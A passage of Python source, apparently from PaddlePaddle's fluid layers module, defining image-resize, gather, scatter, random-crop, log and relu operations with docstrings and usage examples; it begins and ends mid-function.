elif len(input.shape) == 5 and data_format not in ['NCDHW', 'NDHWC']:
raise ValueError(
"Got wrong value for param `data_format`: " + data_format +
" received but only `NCDHW` or `NDHWC` supported for 5-D input.")
def _is_list_or_turple_(data):
return (isinstance(data, list) or isinstance(data, tuple))
if data_format == 'NCHW' or data_format == 'NCDHW':
data_layout = 'NCHW'
if data_format == 'NHWC' or data_format == 'NDHWC':
data_layout = 'NHWC'
inputs = {"X": input}
attrs = {
"out_d": -1,
"out_h": -1,
"out_w": -1,
"interp_method": resample_type,
"align_corners": align_corners,
"align_mode": align_mode,
"data_layout": data_layout
}
if out_shape is not None:
if isinstance(out_shape, Variable):
out_shape.stop_gradient = True
inputs['OutSize'] = out_shape
else:
if not (_is_list_or_turple_(out_shape)):
raise TypeError(
"out_shape should be a list or tuple or Variable.")
# Validate the shape
contain_var = False
for dim_idx, dim_size in enumerate(out_shape):
if isinstance(dim_size, Variable):
contain_var = True
continue
assert dim_size > 0, (
"Each dimension size given in out_shape must be greater than 0."
)
if contain_var:
new_size_tensor = []
size_list = []
for dim in out_shape:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_size_tensor.append(dim)
size_list.append(-1)
else:
assert (isinstance(dim, int))
temp_out = helper.create_variable_for_type_inference(
'int32')
fill_constant(
[1], 'int32', dim, force_cpu=True, out=temp_out)
new_size_tensor.append(temp_out)
size_list.append(dim)
inputs['SizeTensor'] = new_size_tensor
if len(input.shape) == 4:
if len(out_shape) != 2:
raise ValueError("out_shape length should be 2 for "
"input 4-D tensor.")
if contain_var:
attrs['out_h'] = size_list[0]
attrs['out_w'] = size_list[1]
else:
out_shape = list(map(int, out_shape))
attrs['out_h'] = out_shape[0]
attrs['out_w'] = out_shape[1]
if len(input.shape) == 5:
if len(out_shape) != 3:
raise ValueError("out_shape length should be 3 for "
"input 5-D tensor.")
if contain_var:
attrs['out_d'] = size_list[0]
attrs['out_h'] = size_list[1]
attrs['out_w'] = size_list[2]
else:
out_shape = list(map(int, out_shape))
attrs['out_d'] = out_shape[0]
attrs['out_h'] = out_shape[1]
attrs['out_w'] = out_shape[2]
else:
if isinstance(scale, Variable):
scale.stop_gradient = True
inputs["Scale"] = scale
elif isinstance(scale, float) or isinstance(scale, int):
if scale <= 0:
raise ValueError("Attr(scale) should be greater than zero.")
attrs['scale'] = float(scale)
else:
raise TypeError(
"Attr(scale)'s type should be float, int or Variable.")
if isinstance(actual_shape, Variable):
warnings.warn(
"actual_shape will be deprecated, it is recommended to use "
"out_shape instead of actual_shape to specify output shape dynamically."
)
actual_shape.stop_gradient = True
inputs["OutSize"] = actual_shape
elif actual_shape is not None:
raise TypeError("actual_shape should either be Variable or None.")
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='{}_interp'.format(resample_type),
inputs=inputs,
outputs={"Out": out},
attrs=attrs)
return out
@templatedoc(op_type="bilinear_interp")
def resize_bilinear(input,
out_shape=None,
scale=None,
name=None,
actual_shape=None,
align_corners=True,
align_mode=1,
data_format='NCHW'):
"""
This op resizes the input by performing bilinear interpolation based on given
output shape which specified by actual_shape, out_shape and scale
in priority order.
**Warning:** the parameter :attr:`actual_shape` will be deprecated in
the future and only use :attr:`out_shape` instead.
Bilinear interpolation is an extension of linear interpolation for
interpolating functions of two variables (e.g. H-direction and
W-direction in this op) on a rectilinear 2D grid. The key idea is
to perform linear interpolation first in one direction, and then
again in the other direction.
For details of bilinear interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Bilinear_interpolation
Align_corners and align_mode are optional parameters,the calculation
method of interpolation can be selected by them.
Example:
.. code-block:: text
For scale:
if align_corners = True && out_size > 1 :
scale_factor = (in_size-1.0)/(out_size-1.0)
else:
scale_factor = float(in_size/out_size)
Bilinear interpolation:
if:
align_corners = False , align_mode = 0
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = (H_{in}+0.5) * scale_{factor} - 0.5
W_out = (W_{in}+0.5) * scale_{factor} - 0.5
else:
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = H_{in} * scale_{factor}
W_out = W_{in} * scale_{factor}
Parameters:
input(Variable): 4-D Tensor(NCHW), its data type is float32, float64, or uint8,
its data format is specified by :attr:`data_format`.
out_shape(list|tuple|Variable|None): Output shape of resize bilinear
layer, the shape is (out_h, out_w).Default: None. If a list, each
element can be an integer or a Tensor Variable with shape: [1]. If a
Tensor Variable, its dimension size should be 1.
scale(float|Variable|None): The multiplier for the input height or width. At
least one of :attr:`out_shape` or :attr:`scale` must be set.
And :attr:`out_shape` has a higher priority than :attr:`scale`.
Default: None.
actual_shape(Variable): An optional input to specify output shape
dynamically. If provided, image resize
according to this given shape rather than
:attr:`out_shape` and :attr:`scale` specifying
shape. That is to say actual_shape has the
highest priority. It is recommended to use
:attr:`out_shape` if you want to specify output
shape dynamically, because :attr:`actual_shape`
will be deprecated. When using actual_shape to
specify output shape, one of :attr:`out_shape`
and :attr:`scale` should also be set, otherwise
errors would be occurred in graph constructing stage.
Default: None
align_corners(bool): ${align_corners_comment}
align_mode(bool): ${align_mode_comment}
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: 4-D tensor(NCHW or NHWC).
Examples:
.. code-block:: python
#declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[None,3,6,10])
#1
output = fluid.layers.resize_bilinear(input=input,out_shape=[12,12])
#2
#x = np.array([2]).astype("int32")
#dim1 = fluid.data(name="dim1", shape=[1], dtype="int32")
#fluid.layers.assign(input=x, output=dim1)
#output = fluid.layers.resize_bilinear(input=input,out_shape=[12,dim1])
#3
#x = np.array([3,12]).astype("int32")
#shape_tensor = fluid.data(name="shape_tensor", shape=[2], dtype="int32")
#fluid.layers.assign(input=x, output=shape_tensor)
#output = fluid.layers.resize_bilinear(input=input,out_shape=shape_tensor)
#4
#x = np.array([0.5]).astype("float32")
#scale_tensor = fluid.data(name="scale", shape=[1], dtype="float32")
#fluid.layers.assign(x,scale_tensor)
#output = fluid.layers.resize_bilinear(input=input,scale=scale_tensor)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,3,6,10).astype("float32")
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
print(output_data[0].shape)
#1
# (2, 3, 12, 12)
#2
# (2, 3, 12, 2)
#3
# (2, 3, 3, 12)
#4
# (2, 3, 3, 5)
#imperative mode
import paddle.fluid.dygraph as dg
with dg.guard(place) as g:
input = dg.to_variable(input_data)
output = fluid.layers.resize_bilinear(input=input, out_shape=[12,12])
print(output.shape)
# [2L, 3L, 12L, 12L]
"""
return image_resize(input, out_shape, scale, name, 'BILINEAR', actual_shape,
align_corners, align_mode, data_format)
@templatedoc(op_type="trilinear_interp")
def resize_trilinear(input,
out_shape=None,
scale=None,
name=None,
actual_shape=None,
align_corners=True,
align_mode=1,
data_format='NCDHW'):
"""
This op resizes the input by performing trilinear interpolation based on given
output shape which specified by actual_shape, out_shape and scale
in priority order.
**Warning:** the parameter :attr:`actual_shape` will be deprecated
in the future and only use :attr:`out_shape` instead.
Trilinear interpolation is an extension of linear interpolation for
interpolating functions of three variables (e.g. D-direction,
H-direction and W-direction in this op) on a rectilinear 3D grid.
The linear interpolation is performed on three directions.
For details of trilinear interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Trilinear_interpolation
Align_corners and align_mode are optional parameters,the calculation
method of interpolation can be selected by them.
Example:
.. code-block:: text
For scale:
if align_corners = True && out_size > 1 :
scale_factor = (in_size-1.0)/(out_size-1.0)
else:
scale_factor = float(in_size/out_size)
Bilinear interpolation:
if:
align_corners = False , align_mode = 0
input : (N,C,D_in,H_in,W_in)
output: (N,C,D_out,H_out,W_out) where:
D_out = (D_{in}+0.5) * scale_{factor} - 0.5
H_out = (H_{in}+0.5) * scale_{factor} - 0.5
W_out = (W_{in}+0.5) * scale_{factor} - 0.5
else:
input : (N,C,D_in,H_in,W_in)
output: (N,C,D_out,H_out,W_out) where:
D_out = D_{in} * scale_{factor}
H_out = H_{in} * scale_{factor}
W_out = W_{in} * scale_{factor}
Parameters:
input(${x_type}): 5-D Tensor, its data type is float32, float64, or uint8,
its data format is specified by :attr:`data_format`.
out_shape(list|tuple|Variable|None): The output shape of resized tensor, the shape is (out_d, out_h, out_w). Default: None. Every element should be an integer or a Tensor Variable with shape: [1] if it is a list. If it is a Tensor Variable, its dimension size should be 1.
scale(float|Variable|None): The multiplier for the input depth, height or width.
At least one of :attr:`out_shape` or :attr:`scale` must be set.
And :attr:`out_shape` has a higher priority than :attr:`scale`.
Default: None.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
actual_shape(Variable): An optional input to specify output shape
dynamically. If provided, image resize
according to this given shape rather than
:attr:`out_shape` and :attr:`scale` specifying
shape. That is to say actual_shape has the
highest priority. It is recommended to use
:attr:`out_shape` if you want to specify output
shape dynamically, because :attr:`actual_shape`
will be deprecated. When using actual_shape to
specify output shape, one of :attr:`out_shape`
and :attr:`scale` should also be set, otherwise
errors would be occurred in graph constructing stage.
Default: None
align_corners(bool): ${align_corners_comment}
align_mode(bool): ${align_mode_comment}
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCDHW"`, `"NDHWC"`.
The default is `"NCDHW"`. When it is `"NCDHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_depth, input_height, input_width]`.
Returns:
Variable: A 5-D Tensor(NCDHW or NDHWC)
Examples:
.. code-block:: python
#declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[None,3,6,8,10])
#1
output = fluid.layers.resize_trilinear(input=input,out_shape=[12,12,12])
#2
#x = np.array([2]).astype("int32")
#dim1 = fluid.data(name="dim1", shape=[1], dtype="int32")
#fluid.layers.assign(input=x, output=dim1)
#output = fluid.layers.resize_trilinear(input=input,out_shape=[12,dim1,4])
#3
#x = np.array([3,12,12]).astype("int32")
#shape_tensor = fluid.data(name="shape_tensor", shape=[3], dtype="int32")
#fluid.layers.assign(input=x, output=shape_tensor)
#output = fluid.layers.resize_trilinear(input=input,out_shape=shape_tensor)
#4
#x = np.array([0.5]).astype("float32")
#scale_tensor = fluid.data(name="scale", shape=[1], dtype="float32")
#fluid.layers.assign(x,scale_tensor)
#output = fluid.layers.resize_trilinear(input=input,scale=scale_tensor)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,3,6,8,10).astype("float32")
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
print(output_data[0].shape)
#1
# (2, 3, 12, 12, 12)
#2
# (2, 3, 12, 2, 4)
#3
# (2, 3, 3, 12, 12)
#4
# (2, 3, 3, 4, 5)
#imperative mode
import paddle.fluid.dygraph as dg
with dg.guard(place) as g:
input = dg.to_variable(input_data)
output = fluid.layers.resize_trilinear(input=input, out_shape=[12,12,12])
print(output.shape)
# [2L, 3L, 12L, 12L, 12L]
"""
return image_resize(input, out_shape, scale, name, 'TRILINEAR',
actual_shape, align_corners, align_mode, data_format)
@templatedoc(op_type="nearest_interp")
def resize_nearest(input,
out_shape=None,
scale=None,
name=None,
actual_shape=None,
align_corners=True,
data_format='NCHW'):
"""
This op resizes the input by performing nearest neighbor interpolation in both the
height direction and the width direction based on given output shape
which is specified by actual_shape, out_shape and scale in priority order.
**Warning:** the parameter :attr:`actual_shape` will be deprecated in the
future and only use :attr:`out_shape` instead.
Example:
.. code-block:: text
For scale:
if align_corners = True && out_size > 1 :
scale_factor = (in_size-1.0)/(out_size-1.0)
else:
scale_factor = float(in_size/out_size)
Nearest neighbor interpolation:
if:
align_corners = False
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = floor(H_{in} * scale_{factor})
W_out = floor(W_{in} * scale_{factor})
else:
align_corners = True
input : (N,C,H_in,W_in)
output: (N,C,H_out,W_out) where:
H_out = round(H_{in} * scale_{factor})
W_out = round(W_{in} * scale_{factor})
For details of nearest neighbor interpolation, please refer to Wikipedia:
https://en.wikipedia.org/wiki/Nearest-neighbor_interpolation
Parameters:
input(${x_type}): 4-D Tensor, its data type is float32, float64, or uint8,
its data format is specified by :attr:`data_format`.
out_shape(list|tuple|Variable|None): The output shape of resized tensor, the shape is (out_h, out_w). Default: None. Every element should be an integer or a tensor Variable with shape: [1] if it is a list. If it is a tensor Variable, its dimension size should be 1.
scale(float|Variable|None): The multiplier for the input height or width. At
least one of :attr:`out_shape` or :attr:`scale` must be set.
And :attr:`out_shape` has a higher priority than :attr:`scale`.
Default: None.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
actual_shape(Variable): An optional input to specify output shape
dynamically. If provided, image resize
according to this given shape rather than
:attr:`out_shape` and :attr:`scale` specifying
shape. That is to say actual_shape has the
highest priority. It is recommended to use
:attr:`out_shape` if you want to specify output
shape dynamically, because :attr:`actual_shape`
will be deprecated. When using actual_shape to
specify output shape, one of :attr:`out_shape`
and :attr:`scale` should also be set, otherwise
errors would be occurred in graph constructing stage.
Default: None
align_corners(bool): ${align_corners_comment}
data_format (str, optional): Specify the data format of the input, and the data format of the output
will be consistent with that of the input. An optional string from: `"NCHW"`, `"NHWC"`.
The default is `"NCHW"`. When it is `"NCHW"`, the data is stored in the order of:
`[batch_size, input_channels, input_height, input_width]`.
Returns:
Variable: 4-D tensor(NCHW or NHWC).
Examples:
.. code-block:: python
#declarative mode
import paddle.fluid as fluid
import numpy as np
input = fluid.data(name="input", shape=[None,3,6,10])
#1
output = fluid.layers.resize_nearest(input=input,out_shape=[12,12])
#2
#x = np.array([2]).astype("int32")
#dim1 = fluid.data(name="dim1", shape=[1], dtype="int32")
#fluid.layers.assign(input=x, output=dim1)
#output = fluid.layers.resize_nearest(input=input,out_shape=[12,dim1])
#3
#x = np.array([3,12]).astype("int32")
#shape_tensor = fluid.data(name="shape_tensor", shape=[2], dtype="int32")
#fluid.layers.assign(input=x, output=shape_tensor)
#output = fluid.layers.resize_nearest(input=input,out_shape=shape_tensor)
#4
#x = np.array([0.5]).astype("float32")
#scale_tensor = fluid.data(name="scale", shape=[1], dtype="float32")
#fluid.layers.assign(x,scale_tensor)
#output = fluid.layers.resize_nearest(input=input,scale=scale_tensor)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,3,6,10).astype("float32")
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
print(output_data[0].shape)
#1
# (2, 3, 12, 12)
#2
# (2, 3, 12, 2)
#3
# (2, 3, 3, 12)
#4
# (2, 3, 3, 5)
#imperative mode
import paddle.fluid.dygraph as dg
with dg.guard(place) as g:
input = dg.to_variable(input_data)
output = fluid.layers.resize_nearest(input=input, out_shape=[12,12])
print(output.shape)
# [2L, 3L, 12L, 12L]
"""
return image_resize(
input,
out_shape,
scale,
name,
'NEAREST',
actual_shape,
align_corners,
align_mode=1,
data_format=data_format)
def image_resize_short(input, out_short_len, resample='BILINEAR'):
"""
This op resizes a batch of images. The short edge of input images will be
resized to the given 'out_short_len'. The long edge of input images
will be resized proportionately to make images' length-width ratio
constant.
Parameters:
input (Variable): 4-D tensor(NCHW), The input tensor of image resize layer.
out_short_len(int): The length of output images' short edge.
resample (str): resample method, default: BILINEAR.
Returns:
Variable: 4-D tensor(NCHW).
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name="input", shape=[None,3,6,9], dtype="float32")
out = fluid.layers.image_resize_short(input, out_short_len=3)
"""
in_shape = input.shape
if len(in_shape) != 4:
raise ValueError(
"The rank of input must be 4 (num_batches, channels, in_h, in_w).")
hw = in_shape[2:4]
short_idx = hw.index(min(hw))
long_idx = 1 - short_idx
out_shape = list(hw)
out_shape[short_idx] = out_short_len
out_shape[long_idx] = int(
float(out_shape[long_idx]) * (float(out_short_len) / float(hw[
short_idx])) + 0.5)
return image_resize(input=input, out_shape=out_shape, resample=resample)
def gather(input, index, overwrite=True):
"""
**Gather Layer**
Output is obtained by gathering entries of the outer-most dimension
of X indexed by `index` and concatenate them together.
.. math::
Out = X[Index]
.. code-block:: text
Given:
X = [[1, 2],
[3, 4],
[5, 6]]
Index = [1, 2]
Then:
Out = [[3, 4],
[5, 6]]
Args:
input (Variable): The source input tensor with rank>=1. Supported data type is
int32, int64, float32, float64 and uint8 (only for CPU),
float16 (only for GPU).
index (Variable): The index input tensor with rank=1. Data type is int32 or int64.
overwrite (bool, optional): The mode that updating the grad when has same index.
If True, use the overwrite mode to update the grad of the same index,
if False, use the accumulate mode to update the grad of the same index.
Default value is True.
Returns:
output (Variable): The output is a tensor with the same rank as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[-1, 5], dtype='float32')
index = fluid.data(name='index', shape=[-1, 1], dtype='int32')
output = fluid.layers.gather(x, index)
"""
helper = LayerHelper('gather', **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="gather",
inputs={"X": input,
"Index": index},
outputs={"Out": out},
attrs={'overwrite': overwrite})
return out
def gather_nd(input, index, name=None):
"""
**Gather Nd Layer**
This function is actually a high-dimensional extension of :code:`gather`
and supports for simultaneous indexing by multiple axes. :attr:`index` is a
K-dimensional integer tensor, which is regarded as a (K-1)-dimensional
tensor of :attr:`index` into :attr:`input`, where each element defines
a slice of params:
.. math::
output[(i_0, ..., i_{K-2})] = input[index[(i_0, ..., i_{K-2})]]
Obviously, :code:`index.shape[-1] <= input.rank` . And, the output tensor has
shape :code:`index.shape[:-1] + input.shape[index.shape[-1]:]` .
.. code-block:: text
Given:
input = [[[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11]],
[[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]]
input.shape = (2, 3, 4)
* Case 1:
index = [[1]]
gather_nd(input, index)
= [input[1, :, :]]
= [[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]
* Case 2:
index = [[0,2]]
gather_nd(input, index)
= [input[0, 2, :]]
= [8, 9, 10, 11]
* Case 3:
index = [[1, 2, 3]]
gather_nd(input, index)
= [input[1, 2, 3]]
= [23]
Args:
input (Variable): The source input. Its dtype should be int32, int64, float32, float64.
index (Variable): The index input with rank > 1, index.shape[-1] <= input.rank.
Its dtype should be int32, int64.
name (str|None): A name for this layer(optional). If set None, the
layer will be named automatically.
Returns:
output (Variable): A tensor with the shape index.shape[:-1] + input.shape[index.shape[-1]:]
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[3, 4, 5], dtype='float32')
index = fluid.data(name='index', shape=[2, 2], dtype='int32')
output = fluid.layers.gather_nd(x, index)
"""
helper = LayerHelper('gather_nd', **locals())
dtype = helper.input_dtype()
output = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="gather_nd",
inputs={"X": input,
"Index": index},
outputs={"Out": output})
return output
def scatter(input, index, updates, name=None, overwrite=True):
"""
**Scatter Layer**
Output is obtained by updating the input on selected indices based on updates.
.. code-block:: python
import numpy as np
#input:
input = np.array([[1, 1], [2, 2], [3, 3]])
index = np.array([2, 1, 0, 1])
# shape of updates should be the same as input
# shape of updates with dim > 1 should be the same as input
updates = np.array([[1, 1], [2, 2], [3, 3], [4, 4]])
overwrite = False
# calculation:
if not overwrite:
for i in range(len(index)):
input[index[i]] = np.zeros((2))
for i in range(len(index)):
if (overwrite):
input[index[i]] = updates[i]
else:
input[index[i]] += updates[i]
# output:
out = np.array([[3, 3], [6, 6], [1, 1]])
out.shape # [3, 2]
Args:
input (Variable): The input N-D Tensor with rank>=1. Data type can be float32.
index (Variable): The index 1-D Tensor. Data type can be int32, int64. The length of index cannot exceed updates's length, and the value in index cannot exceed input's length.
updates (Variable): update input with updates parameter based on index. shape should be the same as input, and dim value with dim > 1 should be the same as input.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
overwrite (bool): The mode that updating the output when there are same indices.
If True, use the overwrite mode to update the output of the same index,
if False, use the accumulate mode to update the output of the same index.
Default value is True.
Returns:
Variable(Tensor|LoDTensor): The output is a Tensor with the same shape as input.
Examples:
.. code-block:: python
import numpy as np
import paddle.fluid as fluid
input = fluid.layers.data(name='data', shape=[3, 2], dtype='float32', append_batch_size=False)
index = fluid.layers.data(name='index', shape=[4], dtype='int64', append_batch_size=False)
updates = fluid.layers.data(name='update', shape=[4, 2], dtype='float32', append_batch_size=False)
output = fluid.layers.scatter(input, index, updates, overwrite=False)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
in_data = np.array([[1, 1], [2, 2], [3, 3]]).astype(np.float32)
index_data = np.array([2, 1, 0, 1]).astype(np.int64)
update_data = np.array([[1, 1], [2, 2], [3, 3], [4, 4]]).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'data':in_data, "index":index_data, "update":update_data}, fetch_list=[output])
print(res)
# [array([[3., 3.],
# [6., 6.],
# [1., 1.]], dtype=float32)]
"""
helper = LayerHelper('scatter', **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="scatter",
inputs={"X": input,
"Ids": index,
"Updates": updates},
attrs={'overwrite': overwrite},
outputs={"Out": out})
return out
def scatter_nd_add(ref, index, updates, name=None):
"""
**Scatter_nd_add Layer**
Output is obtained by applying sparse addition to a single value
or slice in a Variable.
:attr:`ref` is a Tensor with rank :math:`R`
and :attr:`index` is a Tensor with rank :math:`K` . Thus, :attr:`index`
has shape :math:`[i_0, i_1, ..., i_{K-2}, Q]` where :math:`Q \leq R` . :attr:`updates`
is a Tensor with rank :math:`K - 1 + R - Q` and its
shape is :math:`index.shape[:-1] + ref.shape[index.shape[-1]:]` .
According to the :math:`[i_0, i_1, ..., i_{K-2}]` of :attr:`index` ,
add the corresponding :attr:`updates` slice to the :attr:`ref` slice
which is obtained by the last one dimension of :attr:`index` .
.. code-block:: text
Given:
* Case 1:
ref = [0, 1, 2, 3, 4, 5]
index = [[1], [2], [3], [1]]
updates = [9, 10, 11, 12]
we get:
output = [0, 22, 12, 14, 4, 5]
* Case 2:
ref = [[65, 17], [-14, -25]]
index = [[], []]
updates = [[[-1, -2], [1, 2]],
[[3, 4], [-3, -4]]]
ref.shape = (2, 2)
index.shape = (2, 0)
updates.shape = (2, 2, 2)
we get:
output = [[67, 19], [-16, -27]]
Args:
ref (Variable): The ref input. Its dtype should be float32, float64.
index (Variable): The index input with rank > 1 and index.shape[-1] <= ref.rank.
Its dtype should be int32 or int64 as it is used as indexes.
updates (Variable): The updated value of scatter_nd_add op, and it must have the same dtype
as ref. It must have the shape index.shape[:-1] + ref.shape[index.shape[-1]:].
name (str|None): The output variable name. If set None, the layer will be named automatically.
Returns:
output (Variable): The output is a tensor with the same shape and dtype as ref.
Examples:
.. code-block:: python
import paddle.fluid as fluid
ref = fluid.data(name='ref', shape=[3, 5, 9, 10], dtype='float32')
index = fluid.data(name='index', shape=[3, 2], dtype='int32')
updates = fluid.data(name='update', shape=[3, 9, 10], dtype='float32')
output = fluid.layers.scatter_nd_add(ref, index, updates)
"""
if ref.dtype != updates.dtype:
raise ValueError("ref and updates must have same data type.")
helper = LayerHelper('scatter_nd_add', **locals())
dtype = helper.input_dtype(input_param_name='ref')
output = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="scatter_nd_add",
inputs={"X": ref,
"Index": index,
"Updates": updates},
outputs={"Out": output})
return output
def scatter_nd(index, updates, shape, name=None):
"""
**Scatter_nd Layer**
Output is obtained by scattering the :attr:`updates` in a new tensor according
to :attr:`index` . This op is similar to :code:`scatter_nd_add`, except the
tensor of :attr:`shape` is zero-initialized. Correspondingly, :code:`scatter_nd(index, updates, shape)`
is equal to :code:`scatter_nd_add(fluid.layers.zeros(shape, updates.dtype), index, updates)` .
If :attr:`index` has repeated elements, then the corresponding updates are accumulated.
Because of the numerical approximation issues, the different order of repeated elements
in :attr:`index` may cause different results. The specific calculation method can be
seen :code:`scatter_nd_add` . This op is the inverse of the :code:`gather_nd` op.
Args:
index (Variable): The index input with rank > 1 and index.shape[-1] <= len(shape).
Its dtype should be int32 or int64 as it is used as indexes.
updates (Variable): The updated value of scatter_nd op. Its dtype should be float32, float64.
It must have the shape index.shape[:-1] + shape[index.shape[-1]:]
shape(tuple|list): Shape of output tensor.
name (str|None): The output variable name. If set None, the layer will be named automatically.
Returns:
output (Variable): The output is a tensor with the same type as :attr:`updates` .
Examples:
.. code-block:: python
import paddle.fluid as fluid
index = fluid.data(name='index', shape=[3, 2], dtype='int64')
updates = fluid.data(name='update', shape=[3, 9, 10], dtype='float32')
shape = [3, 5, 9, 10]
output = fluid.layers.scatter_nd(index, updates, shape)
"""
return scatter_nd_add(zeros(shape, updates.dtype), index, updates, name)
@templatedoc()
def random_crop(x, shape, seed=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
shape(${shape_type}): ${shape_comment}
seed(int|${seed_type}|None): ${seed_comment} By default, the seed will
get from `random.randint(-65536, 65535)`.
Returns:
${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
img = fluid.data("img", [None, 3, 256, 256])
# cropped_img is [-1, 3, 224, 224]
cropped_img = fluid.layers.random_crop(img, shape=[3, 224, 224])
# cropped_img2 shape: [-1, 2, 224, 224]
# cropped_img2 = fluid.layers.random_crop(img, shape=[2, 224, 224])
# cropped_img3 shape: [-1, 3, 128, 224]
# cropped_img3 = fluid.layers.random_crop(img, shape=[128, 224])
"""
helper = LayerHelper("random_crop", **locals())
dtype = x.dtype
out = helper.create_variable_for_type_inference(dtype)
if seed is None:
seed = np.random.randint(-65536, 65536)
op_attrs = {"shape": shape}
if isinstance(seed, int):
op_attrs["startup_seed"] = seed
seed = helper.create_variable(
name=unique_name.generate("random_crop_seed"),
dtype="int64",
persistable=True)
elif not isinstance(seed, Variable):
raise ValueError("'seed' must be a Variable or an int.")
helper.append_op(
type="random_crop",
inputs={"X": x,
"Seed": seed},
outputs={"Out": out,
"SeedOut": seed},
attrs=op_attrs)
return out
def log(x, name=None):
"""
Calculates the natural log of the given input tensor, element-wise.
.. math::
Out = \\ln(x)
Args:
x (Variable): Input LoDTensor or Tensor. Must be one of the following types: float32, float64.
name (str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: The natural log of the input LoDTensor or Tensor computed element-wise.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph Organizing
x = fluid.layers.data(name="x", shape=[1], dtype="float32")
res = fluid.layers.log(x)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[1], [2]]).astype(np.float32)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i}, fetch_list=[res])
print(res_val) # [[0.], [0.6931472]]
"""
if in_dygraph_mode():
return core.ops.log(x)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], "log")
inputs = {'X': [x]}
helper = LayerHelper('log', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type="log", inputs={"X": x}, outputs={"Out": out})
return out
@templatedoc()
def relu(x, name=None):
"""
${comment}
Args:
x(Variable): ${x_comment}
name(str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Variable: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
in1 = np.array([[-1,0],[1,2.6]])
with fluid.dygraph.guard():
x1 = fluid.dygraph.to_variable(in1)
out1 = fluid.layers.relu(x1)
print(out1.numpy())
# [[0. 0. ]
# [1. 2.6]]
"""
if in_dygraph_mode():
return core.ops.relu(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'relu')
inputs = {'X': [x]}
helper = LayerHelper('relu', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="relu", inputs={"X": helper.input('x')}, outputs={"Out": out})
return out
def selu(x, scale=None, alpha=None, name=None):
"""
Selu Operator.
The equation is:
.. math::
selu= \\lambda*
\\begin{cases}
x &\\quad \\text{ if } x>0 \n
\\alpha * e^x - \\alpha &\\quad \\text{ if } x<=0
\\end{cases}
The input `X` can carry the LoD (Level of Details) information,
or not. And the output shares the LoD information with input `X`.
Args:
x (Variable): The input N-D Tensor.
scale(float, optional): lambda in selu activation function,
the default value is 1.0507009873554804934193349852946.
For more information about this value, please refer
to: https://arxiv.org/abs/1706.02515.
alpha(float, optional): alpha in selu activation function,
the default value is 1.6732632423543772848170429916717.
For more information about this value, please refer
to: https://arxiv.org/abs/1706.02515.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable(Tensor|LoDTensor): The output Tensor or LoDTensor with the same shape and LoD information as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
inputs = fluid.layers.data(name="x", shape=[2, 2], dtype="float32")
output = fluid.layers.selu(inputs)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
